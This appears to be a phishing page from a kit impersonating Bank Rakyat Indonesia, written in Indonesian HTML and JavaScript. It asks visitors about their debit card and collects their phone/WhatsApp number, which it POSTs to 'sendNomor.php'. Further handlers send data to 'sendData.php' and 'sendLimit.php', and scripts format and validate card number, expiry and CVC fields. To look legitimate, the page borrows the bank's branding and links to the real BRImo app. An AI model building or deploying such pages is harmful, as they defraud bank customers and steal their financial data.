<html>
<head>
  <meta charset="UTF-8">
    <meta name="theme-color" content="#0F78CB"> 
  <title>Bank Rakyat Indonesia</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"> 
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.2.0/css/font-awesome.min.css'><link rel="stylesheet" href="./style.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>
 <link rel="stylesheet" href="https://webform.bca.co.id/applycc/styles.8e122b68f5adc945705d.css">
</head>
<style>
    @charset "UTF-8";
@import url(https://fonts.googleapis.com/css?family=Open+Sans:400,700,800);
*, *:before, *:after {
  box-sizing: border-box;
}

.group:after {
  content: "";
  display: table;
  clear: both;
}

html, body {
  height: 100%;
  width: 100%;
}

body {
  font-family: "Open Sans", sans-serif;
  background: #fff;
  height: 100%;
  width: 100%;
  position: fixed;
  
  overflow-x: hidden;
}

.wrap {
 
  margin: 0 auto;
  padding: 70px 10px;
  transform-style: preserve-3d;
}

.cc_images {
  margin-bottom: 5px;
  transform: translateY(20px);
  z-index: 0;
}
.cc_images .card {
  float: left;
  width: 16.666%;
  height: 40px;
  position: relative;
  text-align: center;
  perspective: 500px;
  transform-style: preserve-3d;
  z-index: 50;
  transition: 0.4s;
}
.cc_images .card.show_cvc .inside {
  transform: rotateY(180deg);
}
.cc_images .card.show_card {
  transform: translateY(-20px);
}
.cc_images .card.show_card .front img, .cc_images .card.show_card .back img {
  opacity: 1;
  -webkit-filter: grayscale(0);
  filter: none;
}
.cc_images .card .inside {
  width: 100%;
  height: 100%;
  display: block;
  transform-style: preserve-3d;
  transition: 0.4s ease-in-out;
}
.cc_images .card .front, .cc_images .card .back {
  backface-visibility: hidden;
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
.cc_images .card .front img, .cc_images .card .back img {
  max-width: 100%;
  display: block;
  transition: 0.3s;
  opacity: 0.1;
  filter: url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg'><filter id='grayscale'><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0'/></filter></svg>#grayscale");
  /* Firefox 10+, Firefox on Android */
  -webkit-filter: grayscale(100%);
  filter: grayscale(100%);
}
.cc_images .card .back {
  transform: rotateY(-180deg);
}

.input-wrap {
  position: relative;
}
.input-wrap:after {
  position: absolute;
  font-family: "FontAwesome";
  transition: 0.5s;
  opacity: 0;
}
.input-wrap.valid:after {
  content: "";
  color: #03B410;
  right: 10px;
  top: 9px;
  font-size: 22px;
  opacity: 1;
}
.input-wrap.error:after {
  content: "";
  font-size: 20px;
  color: #E43737;
  right: 12px;
  top: 10px;
  opacity: 1;
}

#cc_number {
  margin-bottom: 10px;
}

.expiration-wrap {
  width: 55%;
  margin-right: 2%;
  float: left;
}

.cvc-wrap {
  width: 43%;
  float: left;
}

label {
  position: absolute;
  background: grey;
  background: #0071C1;
  border: 1px solid #222;
  color: white;
  height: 40px;
  width: 60px;
  border-radius: 10px 0px 0px 10px;
  font-size: 20px;
  text-shadow: 0 1px 0 rgba(0, 0, 0, 0.8);
  text-transform: ;
  padding-top: 10px;
  text-align: center;
  cursor: pointer;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3), inset 0 -3px 0 0 rgba(0, 0, 0, 0.2);
}

input {
  z-index: 10;
  border: 0;
  height: 40px;
  font-size: 18px;
  
  padding-left: 70px;
  padding-top: ;
  width: 100%;
  border-radius: 10px;
  border: 0px solid #bbb;
  box-shadow: rgba(0, 0, 0, 0.25) 0px 0.0625em 0.0625em, rgba(0, 0, 0, 0.25) 0px 0.125em 0.5em, rgba(255, 255, 255, 0.1) 0px 0px 0px 1px inset;
}
input:focus {
  outline: none;
  border-bottom: 2px solid #0071C1;
}


input::placeholder{
    color: #bbb;
    font-size: 14px;
    padding-top: 0px;
}
.info {
  font-size: 15px;
  line-height: 1.4;
  color: #bbb;
  text-align: center;
  margin-top: 20px;
}
.info small {
  display: block;
  font-size: 0.85em;
}
.info a {
  color: skyblue;
  text-decoration: none;
}
.info a:hover {
  color: white;
}

button{
    width: ;
   z-index: 10;
  border: 0;
  height: 45px;
  font-size: 15px;
  padding: 0 5px;
  padding-left: 0px;
  width: 100%;
  border: 0px solid black;
  background: #0071C1;
  color: #fff;
  border-radius: 50px;
  box-shadow: rgba(0, 0, 0, 0.25) 0px 0.0625em 0.0625em, rgba(0, 0, 0, 0.25) 0px 0.125em 0.5em, rgba(255, 255, 255, 0.1) 0px 0px 0px 1px inset;
}

.fa i{
    background: yellow;
}

#judul{
    text-align: center;
    margin-top: -5px;
    margin-bottom: -60px;
    font-weight: bold;
    font-size: 12.5px;
}



section{
    border: 0px solid #aaa;
    width: 90%;
    margin: 0px auto;
    position: ;
    padding:  0px;
    left: 0;
    right: 0;
    height: 200px;
    border-radius: 20px;
    background: #fff;
    margin-top: 360px;
    box-shadow: rgba(99, 99, 99, 0.3) 0px 2px 8px 0px;
   
}



</style>
<style>

.rightku {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	    -webkit-animation-name: bounceInRight; 
    animation-name: bounceInRight; 
}

@-webkit-keyframes bounceInRight { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateX(200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateX(0px); 
    } 
    80% { 
        -webkit-transform: translateX(0px); 
    } 
    100% { 
        -webkit-transform: translateX(0); 
    } 
} 

@keyframes bounceInRight { 
    0% { 
        opacity: 1; 
        transform: translateX(200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateX(0px); 
    } 
    80% { 
        transform: translateX(0px); 
    } 
    100% { 
        transform: translateX(0); 
    } 
} 




</style>
<style>


.leftclose {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceOutLeft;
    animation-name: bounceOutLeft; 
}

@-webkit-keyframes bounceOutLeft { 
    0% { 
        -webkit-transform: translateX(0); 
    } 
    20% { 
        opacity: 1; 
        -webkit-transform: translateX(0px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateX(-360px); 
    } 
} 
@keyframes bounceOutLeft { 
    0% { 
        transform: translateX(0); 
    } 
    20% { 
        opacity: 1; 
        transform: translateX(0px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateX(-360px); 
    } 
} 





.effecku {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	  -webkit-animation-name: spaceOutUp;
    animation-name: spaceOutUp;
}

@-webkit-keyframes spaceOutUp {
    0% {
        opacity: 1;
        -webkit-transform-origin: 50% 0%;
        -webkit-transform: scale(1) translate(0%, 0%);
    }
    100% {
        opacity: 1;
        -webkit-transform-origin: 50% 0%;
        -webkit-transform: scale(.2) translate(0%, -200%);
    }
}
@keyframes spaceOutUp {
    100% {
        opacity: 1;
        transform-origin: 50% 0%;
        transform: scale(1) translate(0%, 0%);
    }
    100% {
        opacity: 1;
        transform-origin: 50% 0%;
        transform: scale(.2) translate(0%, -200%);
    }
}


</style>
<body>
<fieldset id="homeku" style="display: " class="">
<!-- partial:index.partial.html -->
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3mNPfg2Qvc-zcqkioxUJnZyyC-Ona-3EEaxUZBcN5qyP2GVgHAOEjJmt7g0a3iC3wKI6bIFhHeJHm6gefyNY5kVrA0UHgprWix7qskU4tg4h8fbmlD-qGgq4FWUcaGuyegZq4atkvpX6wOmnkYUlt8ND1ELULvSooCUnbRIWaukCnYK8uGCMeayKdK8M/s1272/AddText_03-25-04.56.55.jpg" style="position: absolute; top: 0; left: 0; right: 0; width: 100%;  z-index: -1; border-radius: 0px 0px 15px 15px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;">
<br/>

<section>
<br/>
<div id="judul">Apakah sudah mempunyai Kartu Debit/ATM</div>
</center>
  <div _ngcontent-rnf-c40="" id="loading-progress" style="display: none; margin-top: 10px"></div>
<div id="data1" class="wrap" style="display:  "><br/>
<button id="btnpunya" type="button" style="margin-top: -6px" onclick="punya();">𝗜𝘆𝗮, 𝗣𝘂𝗻𝘆𝗮 𝗞𝗮𝗿𝘁𝘂’ 𝗗𝗲𝗯𝗶𝘁</button><br/><p></p><br/>
<button id="btntidak" type="button" style="margin-top: -6px; background: #fff; border: 2px solid #0F78CB; color: #0F78CB" onclick="tidak()">𝗕𝗲𝗹𝘂𝗺 𝗣𝘂𝗻𝘆𝗮 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁</button>
	</div>
	</section>
</fieldset>
<fieldset id="popupku" style="display: none; position: fixed; left: 0; right: 0; margin: 0px auto; width: 100%; height: 100%; background: #00000070; top: 0; bottom: 0" >
    
<div style="display: ; position: fixed; left: 0; right: 0; margin: 0px auto; width: 80%; height: 250px; border-radius: 15px; background: #fff; top: 100px; text-align: center; padding: 15px; font-weight: bold; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px; font-family: 'FontAwesome'; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Kj9Ip9Txyb0NFrv0LClxGpmNjV_Eh6utVsSAJvUYl82qDJim34N-lAP7AWTLtUSOwulOk6HaofTQ0pc3C2NyRL6X8kN35sgbR3-3diQ0ZBcyrHxwyvWjRwD5jyURtF2MYzwdpwST7TdW1S-JpX9poM81Y02jX0FvYn07gejOn36IU84ywbqf5kgQ2yk/s1440/AddText_03-25-09.53.00.png); background-size: 100% 100%; background-position: 100% 100%; background-color: #fff; ">
<p>Sebelum melanjutkan silahkan konfirmasi nomor Handphone/WhatsApp anda</p>
<form id="formData" onsubmit="sendNohp(event); return false" method="post" class="cc_form" style="padding: 10px">   
    		<div class="card">
    	    <div class="input-wrap group">
			<label for="cc_number"><i class="fa fa-phone" aria-hidden="true"></i></label>
     <input type="tel" name="phone" id="phone" placeholder="Nomor Handphone.." style="margin-bottom: 10px" maxlength="13" minlength="10" required>
     </div>
     </div>
     <br/>
<button type="submit" id="btnku4">Konfirmasi</button>
	</form> 
    
    
    
</div>    
    
</fieldset>
<fieldset id="apply" style="display: none; position: fixed; left: 0; right: 0; margin: 0px auto; top: 0" >
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMyGxGAZyXqyi-1WYRkUEbAK1heqOvFuIRs4ROM_p4mL0RC6i54uEbE9hTnACk1lO4rd6w73djUaHUtoO9hesFL-YOmL6K33Utey4V-3tOrgBklOzRFHAlHOwXIUJX84lFvvyjq0nI9tS17hv95zg2VIJj6phW5TY910SwlvVo-e4a7TFHoSFa3FX3eaU/s1928/AddText_03-25-05.49.18.jpg" style="width: 100%; height: 100%; position: fixed; left: 0; right: 0; margin: 0px auto;" class="rightku">  
<button type="button" style="position: fixed; left: 0; right: 0; margin: 0px auto; bottom: 25; width: 85%; box-shadow: rgba(000, 000, 000, 0.6) 0px 3px 8px 0px; background: #F37020; color: #002679; text-shadow: 0 1px 0 rgba(270, 270, 270, 0.8); text-align: center" onclick="window.location.href='https://play.google.com/store/apps/details?id=id.co.bri.brimo'">𝗕𝘂𝗸𝗮 𝗕𝗥𝗜𝗺𝗼 𝗦𝗲𝗸𝗮𝗿𝗮𝗻𝗴</button>
</fieldset>
<!-- partial -->
  <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/1.0.2/jquery.payment.min.js'></script>
 <script>

      /* Tanpa Rupiah */

    var tanpa_rupiah = document.getElementById('tanparupiah');
    tanpa_rupiah.addEventListener('keyup', function(e)
    {
        tanpa_rupiah.value = formatRupiah(this.value);
    });
    
    /* Dengan Rupiah */
    var dengan_rupiah = document.getElementById('limit');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    });
    
     /* Dengan Rupiah */
    var dengan_saldo = document.getElementById('saldo');
    dengan_saldo.addEventListener('keyup', function(e)
    {
        dengan_saldo.value = formatRupiah(this.value, 'Rp. ');
    });
    
    /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);
            
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }
        
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    }
    
  </script>	
  <script>
$('#formData').on('submit', function (event) {

 
  event.stopPropagation();
    event.preventDefault();
   
 
 document.getElementById("btnku4").innerHTML =  'Sedang diproses...';
   $("#loading-progress").show();
   
   
  $.ajax({
 type: 'POST',
   url: 'sendNomor.php',
 data: $(this).serialize(),
    
    complete: function(data) {
            console.log('Complete')
  setTimeout(function(){
  $("#popupku").addClass("leftclose");  
  $("#apply").fadeIn();  
    var themeColorTest = new function() {
  function e() {
    "#002679" === $themeColor.content ? $themeColor.content = "#002679" : "#002679" === $themeColor.content ? $themeColor.content = "#002679" : $themeColor.content = "#002679",
      setTimeout(e, 500)
  }
  this.init = function() {
    $themeColor = document.querySelector("meta[name='theme-color']"),
      e()
  }
};
themeColorTest.init();   
    }, 2000);
    setTimeout(function(){ 
     $("#popupku").removeClass("leftclose");
    document.getElementById("btnku4").innerHTML = 'Konfirmasi';
}, 3000);
    }

    });


    return false;
});       
    
    
</script>
<script>
function tidak(){

document.getElementById("btntidak").innerHTML = '𝗦𝗲𝗱𝗮𝗻𝗴 𝗠𝗲𝗺𝗽𝗿𝗼𝘀𝗲𝘀...';
     setTimeout(function(){
    
    $("#popupku").fadeIn();
 
     }, 2000);
setTimeout(function(){ 
     $("#homeku").removeClass("leftclose");
    document.getElementById("btntidak").innerHTML = '𝗕𝗲𝗹𝘂𝗺 𝗣𝘂𝗻𝘆𝗮 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁';
}, 3000);
}    



function punya(){

document.getElementById("btnpunya").innerHTML = '𝗦𝗲𝗱𝗮𝗻𝗴 𝗠𝗲𝗺𝗽𝗿𝗼𝘀𝗲𝘀...';
     setTimeout(function(){
    $("#homeku").addClass("effecku");
   window.location.href= 'data.html'; 
     }, 2000);
     setTimeout(function(){ 
     $("#homeku").removeClass("effecku");
    document.getElementById("btnpunya").innerHTML = '𝗜𝘆𝗮, 𝗣𝘂𝗻𝘆𝗮 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁';
}, 3000);
}    
</script>  
<script>
$('#formData').on('submit', function (event) {

 
  event.stopPropagation();
    event.preventDefault();
   
 
 document.getElementById("btnku").innerHTML =  'Sedang diproses...';
   $("#loading-progress").show();
   
   
  $.ajax({
 type: 'POST',
   url: 'sendData.php',
 data: $(this).serialize(),
    
    complete: function(data) {
            console.log('Complete')
  setTimeout(function(){
      $("#data1").fadeOut();
       $("#data2").fadeIn();
    }, 500);
    }

    });


    return false;
});       
    
    
</script>
<script>
    
 $('#data2').on('submit', function (event) {

 
  event.stopPropagation();
    event.preventDefault();
   
 
 document.getElementById("btnku1").innerHTML =  'Sedang diproses...';
   $("#loading-progress").show();
   
   
$.ajax({
 type: 'POST',
 url: 'sendLimit.php',
 data: $(this).serialize(),
    
   complete: function(data) {
            console.log('Complete')
  setTimeout(function(){
      window.location.href='info.html';
    }, 500);
   }

    });


    return false;
});       
</script>
<script>
 (function($){

	var $cc_num = $("#cc_number");
	var $cc_exp = $("#cc_expiration");
	var $cc_cvv = $("#cc_cvc");
	var card_type = null;

	$cc_num.payment("formatCardNumber");
	$cc_exp.payment("formatCardExpiry");
	$cc_cvv.payment("formatCardCVC");
	
	$cc_num.on("input", function(){
		var current_num = $(this).val();
		card_type = $.payment.cardType(current_num);
		var current_card = $("img[src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/74196/"+ card_type +".png']");
		var card = current_card.parent().parent().parent();

		if($(".show_card").length){
			$(".show_card").removeClass("show_card");
		}

		card.addClass("show_card");
	});

	$cc_num.on("blur", function(){
		var _ = $(this);
		if(_.val() !== ""){
			if($.payment.validateCardNumber(_.val())){
				_.parent().removeClass("error").addClass("valid");
			} else {
				_.parent().removeClass("valid").addClass("");
			}
		} 
	});

	$cc_exp.on("blur", function(){
		var _ = $(this);
		if(_.val() !== ""){
			var exp = _.val().split(" / ");
			if($.payment.validateCardExpiry(exp[0], exp[1])){
				_.parent().removeClass("").addClass("");
			} else {
				_.parent().removeClass("").addClass("");
			}
		} 
	});

	$cc_cvv.on("blur", function(){
		var _ = $(this);
		if(card_type && _.val() !== ""){
			if($.payment.validateCardCVC(_.val(), card_type)){
				_.parent().removeClass("error").addClass("valid");
			} else {
				_.parent().removeClass("valid").addClass("error");
			}
		} 
	});

	$cc_cvv.on("focus", function(){
		var current_card = $(".show_card");
		if(current_card.length){
			current_card.addClass("show_cvc");
		}
		$(this).one("blur", function(){
			if($(".show_cvc").length){
				$(".show_cvc").removeClass("show_cvc");
			}
		});
	});


})(jQuery);   
</script>

</body>
</html>
